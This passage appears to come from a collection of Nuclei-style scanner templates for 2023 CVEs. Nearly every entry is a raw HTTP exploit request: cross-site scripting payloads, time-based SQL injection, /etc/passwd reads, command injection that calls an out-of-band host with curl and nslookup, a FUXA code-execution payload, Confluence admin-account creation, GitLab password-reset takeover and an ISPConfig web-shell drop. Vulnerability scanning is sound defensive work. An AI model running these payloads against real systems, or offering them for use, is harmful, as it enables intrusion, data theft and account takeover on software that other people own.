</wps:ResponseForm>\n</wps:Execute>\n"],"payloads":{"path":["/wms","/geoserver/wms"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-2227","info":{"name":"Modoboa < 2.1.0 - Improper Authorization","severity":"critical"},"requests":[{"raw":["GET /api/v2/parameters/core/ HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: 7h3h4ckv157\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["label\":","default_password\":","authentication_type\":\"local"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2272","info":{"name":"Tiempo.com <= 0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Tiempo\")"],"condition":"and"}]}]},{"id":"CVE-2023-0099","info":{"name":"Simple URLs < 115 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body, \"</script><svg/onload=alert(document.domain)>\")","contains(body_2, \"search_term\")"],"condition":"and"}]}]},{"id":"CVE-2023-32117","info":{"name":"Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-json/igd/v1/get-users-data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"name\":","\"email\":","\"role\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47684","info":{"name":"Essential Grid <= 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=Essential_Grid_Front_request_ajax&client_action=load_post_content&postid=1&settings={%22lbMax%22:%22\\%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%22} HTTP/2\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","lightbox"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34754","info":{"name":"Bloofox v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","POST /admin/index.php?mode=settings&page=plugins&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nstatus=1&pid=14'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+Ptkr%26send%3dSave&send=Save\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","contains_all(body_2, \"Active</option>\", \"Inactive</option>\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-36845","info":{"name":"Juniper J-Web - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /?PHPRC=/dev/fd/0 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nauto_prepend_file=\"/etc/passwd\"\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["Juniper"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34020","info":{"name":"Uncanny Toolkit for LearnDash - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/ult/v2/review-banner-visibility&action=maybe-later&redirect=yes&redirect_url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-1020","info":{"name":"Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","no_participation"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33831","info":{"name":"FUXA - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/runscript HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"headers\": {\"normalizedNames\": {}, \"lazyUpdate\": \"null\"}, \"params\": {\"script\": {\"parameters\": [{\"name\": \"ok\", \"type\": \"tagid\", \"value\": \"\"}], \"mode\": \"\", \"id\": \"\", \"test\": \"true\", \"name\": \"ok\", \"outputId\": \"\", \"code\": \"require('child_process').exec('id > ./_images/{{filename}}')\"}}}\n","GET /_images/{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Script OK:"]},{"type":"word","part":"body_2","words":["uid","gid","groups"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4148","info":{"name":"Ditty < 3.1.25 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ditty&page=ditty_export&tab=export_ditty&\"><script>alert(/XSS/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(/XSS/)</script>\") && contains(body_2, \"ditty\")","contains(content_type_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-3368","info":{"name":"Chamilo LMS <= v1.11.20 Unauthenticated Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/main/webservices/additional_webservices.php"],"headers":{"Content-Type":"application/xml"},"body":"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"{{BaseURL}}\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ns2=\"http://xml.apache.org/xml-soap\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n  <SOAP-ENV:Body>\n    <ns1:wsConvertPpt>\n      <param0 xsi:type=\"ns2:Map\">\n        <item>\n          <key xsi:type=\"xsd:string\">file_data</key>\n          <value xsi:type=\"xsd:string\"></value>\n        </item>\n        <item>\n          <key xsi:type=\"xsd:string\">file_name</key>\n          <value xsi:type=\"xsd:string\">$(curl http://{{interactsh-url}}/)</value>\n        </item>\n        <item>\n          <key xsi:type=\"xsd:string\">service_ppt2lp_size</key>\n          <value xsi:type=\"xsd:string\">720x540</value>\n        </item>\n      </param0>\n    </ns1:wsConvertPpt>\n  </SOAP-ENV:Body>\n</SOAP-ENV:Envelope>\n","matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","words":["wsConvertPptResponse"],"part":"body"},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2023-35159","info":{"name":"XWiki >= 3.4-milestone-1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)","{{BaseURL}}/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert(document.domain)","deletespace.Sandbox"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-43323","info":{"name":"mooSocial 3.1.8 - External Service Interaction","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["mooConfig"],"internal":true}]},{"raw":["POST /activities/ajax_share HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n[data%5Btype%5D=User&data%5Btarget_id%5D=0&data%5Baction%5D=wall_post&data%5Bwall_photo%5D=&data%5Bsubject_type%5D=&messageText=asas&data%5BuserShareLink%5D=&data%5BuserShareVideo%5D=http://{{interactsh-url}}%2F%3Fnull&data%5BuserTagging%5D=&data%5BshareImage%5D=1&data%5Bprivacy%5D=1]\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]}]}]},{"id":"CVE-2023-22515","info":{"name":"Atlassian Confluence - Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /setup/setupadministrator-start.action HTTP/1.1\nHost: {{Hostname}}\n","GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n","GET /setup/setupadministrator-start.action HTTP/1.1\nHost: {{Hostname}}\n","@timeout:20s\nPOST /setup/setupadministrator.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Atlassian-Token: no-check\n\nusername={{to_lower(username)}}&fullName=admin&email={{email}}.com&password={{password}}&confirm={{password}}&setup-next-button=Next\n","POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Atlassian-Token: no-check\n\nos_username={{to_lower(username)}}&os_password={{password}}&login=Log+in&os_destination=%2Findex.action\n","GET /welcome.action HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, 'Setup is already complete')","contains(body_3, 'Please configure the system administrator account for this Confluence installation')","contains(location_5, '/index.action')","status_code_5 == 302","contains(body_6, 'Administration')"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2023-28343","info":{"name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /index.php/management/set_timezone HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nAccept-Encoding: gzip, deflate\nReferer: {{RootURL}}/index.php/management/datetime\n\ntimezone=`nslookup {{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Time Zone updated successfully"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46574","info":{"name":"TOTOLINK A3700R - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"<title>TOTOLINK</title>\")"],"condition":"and"}]},{"raw":["GET /cgi-bin/cstecgi.cgi HTTP/1.1\nHost: {{Hostname}}\n\n{\"topicurl\":\"UploadFirmwareFile\",\"FileName\":\";id\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0600","info":{"name":"WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Real Time Traffic"]}]},{"raw":["@timeout: 30s\nGET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"sleep(6)\")"],"condition":"and"}]}]},{"id":"CVE-2023-22480","info":{"name":"KubeOperator Foreground `kubeconfig` - File Download","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/clusters/kubeconfig/k8s"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apiVersion:","clusters:"],"condition":"and"},{"type":"word","part":"header","words":["application/download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2479","info":{"name":"Appium Desktop Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=<img/src=\"http://{{interactsh-url}}\">"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-0678","info":{"name":"PHPIPAM <v1.5.1 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/functions/scripts/find_full_subnets.php"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Array\", \"[subnet]\", \"[description]\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-26067","info":{"name":"Lexmark Printers - Command Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Length: 49\n\nFT_Custom_lbtrace=$({{cmd}})\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'dns')","contains(body, 'Fax Trace Settings')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-40355","info":{"name":"Axigen WebMail - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//","{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//","{{BaseURL}}/index.hsp?m=',alert(document.domain),'"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\\\'-alert(document.domain),//","',alert(document.domain),'"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"text/html\")","contains(response, \"Axigen\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-2356","info":{"name":"Mlflow <2.3.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\"}\n","POST /api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\", \"source\": \"file://{{Hostname}}/../../../../../../../\"}\n","GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-36844","info":{"name":"Juniper Devices - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileData\": \"data:text/html;base64,{{base64(payload)}}\", \"fileName\": \"{{rand_base(5, \"abc\")}}.php\", \"csize\": {{len(payload)}}}]\n","POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileName\": \"{{rand_base(5, \"abc\")}}.ini\", \"fileData\": \"data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}\", \"csize\": \"97\" }]\n","GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"original_fileName\":","\"converted_fileName\":"],"condition":"and"},{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","part":"body_1","name":"phpfile","regex":["([a-f0-9]{64}\\.php)"],"internal":true},{"type":"regex","part":"body_2","name":"inifile","regex":["([a-f0-9]{64}\\.ini)"],"internal":true}]}]},{"id":"CVE-2023-4174","info":{"name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/index?q=\"><img+src=a+onerror=alert(document.domain)>ridxm","{{BaseURL}}/stores\"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent","{{BaseURL}}/user_info\"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends","{{BaseURL}}/faqs\"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search=\"><img+src=a+onerror=alert(document.domain)>ridxm","{{BaseURL}}/classifieds\"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>ridxm","mooSocial"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-33405","info":{"name":"BlogEngine CMS - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/default.aspx?years=http://oast.pro"],"matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"}]}]},{"id":"CVE-2023-24735","info":{"name":"PMB 7.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/opac_css/pmb.php?url=https://oast.me&hash={{md5('https://oast.me')}}"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-1263","info":{"name":"Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=cmp_get_post_detail&id=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"img\":","\"date\":","\"title\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2780","info":{"name":"Mlflow <2.3.1 - Local File Inclusion Bypass","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file://./etc\"}\n","GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-22478","info":{"name":"KubePi <= v1.6.4 LoginLogsSearch - Unauthorized Access","severity":"high"},"requests":[{"raw":["@timeout 10\nPOST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"apiVersion\":","\"uuid\":","\"userName\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-5089","info":{"name":"Defender Security < 4.1.0 - Protection Bypass (Hidden Login Page)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?gf_page=randomstring"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]},{"type":"word","part":"header","words":["%2F%3Fgf_page%3Drandomstring&reauth=1"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2023-44812","info":{"name":"mooSocial v.3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","part":"body","words":["mooSocial"],"internal":true,"case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/admin/home/login?admin_redirect_url=aHR0cDovL2xvY2FsaG9zdC9tb29zb2NpYWwvYWRtaW4vcGx1Z2lucw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-5003","info":{"name":"Active Directory Integration WP Plugin < 4.1.10 - Log Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/ldap-authentication-report.csv"],"matchers-condition":"and","matchers":[{"type":"word","words":["ID","USERNAME","TIME","LDAP STATUS"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33338","info":{"name":"Old Age Home Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=vaday%27+or+1%3D1%23&password=password&submit=\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Change Password\")","contains(body_2, \"Old Age Home Management System|| Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-40779","info":{"name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5coast.pro/%2f%2e%2e"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-35813","info":{"name":"Sitecore - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{{url_encode(payload)}}\")\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, '{{string}}')","contains_all(body, 'commands', 'command', 'value')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-34751","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=user&page=groups&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=User&backend=0&content=0&settings=0&permissions=0&tools=0&demo=0&gid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&name_old=User&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-23161","info":{"name":"Art Gallery Management System Project v1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["center\"><img src=1 onerror=alert(document.domain)>","Art Type"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46818","info":{"name":"ISPConfig - PHP Code Injection","severity":"high"},"requests":[{"raw":["POST /login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&s_mod=login\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"Set-Cookie\")","status_code == 302"],"condition":"and"}]},{"raw":["POST /admin/language_edit.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nlang=en&module=help&lang_file={{lang-file}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(response, \"_csrf_id\", \"_csrf_key\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"lang_file_location","group":1,"regex":["<legend>Language file: (.*)</legend>"],"internal":true},{"type":"regex","name":"csrf_id","group":1,"regex":["_csrf_id\" value=\"(.*)\" />"],"internal":true},{"type":"regex","name":"csrf_key","group":1,"regex":["_csrf_key\" value=\"(.*)\" />"],"internal":true}]},{"raw":["POST /admin/language_edit.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlang=en&module=help&lang_file={{lang-file}}&_csrf_id={{csrf_id}}&_csrf_key={{csrf_key}}&records[%5C]={{payload-url-enc}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200"]}]},{"raw":["GET /admin/{{websh-file}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nC: {{base64('\u00a7echo-cmd\u00a7')}}\n"],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","words":["{{echo-cmd-hash}}"]}]},{"raw":["GET /admin/{{websh-file}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nC: {{base64('rm \u00a7lang_file_location\u00a7')}}\n"],"matchers":[{"type":"status","status":[200]}]},{"raw":["GET /admin/{{websh-file}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nC: {{base64('rm \u00a7websh-file\u00a7')}}\n"],"matchers":[{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2122","info":{"name":"Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<img src=a onerror=alert(document.domain)>\")","contains(body_2, \"Image optimizer\")"],"condition":"and"}]}]},{"id":"CVE-2023-7028","info":{"name":"GitLab - Account Takeover via Password Reset","severity":"high"},"requests":[{"raw":["GET /users/sign_in HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"token","group":1,"regex":["name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\""],"internal":true}]},{"raw":["@timeout: 20s\nPOST /users/password HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/users/password/new\n\nauthenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}\n"],"payloads":{"username":["admin@example.com","admin@{{RDN}}","root@{{RDN}}","gitlab@{{RDN}}","git@{{RDN}}"]},"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'smtp')"]}],"extractors":[{"type":"dsl","dsl":["username"]}]}]},{"id":"CVE-2023-33629","info":{"name":"H3C Magic R300-2100M - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /goform/aspForm HTTP/1.1\nHost: 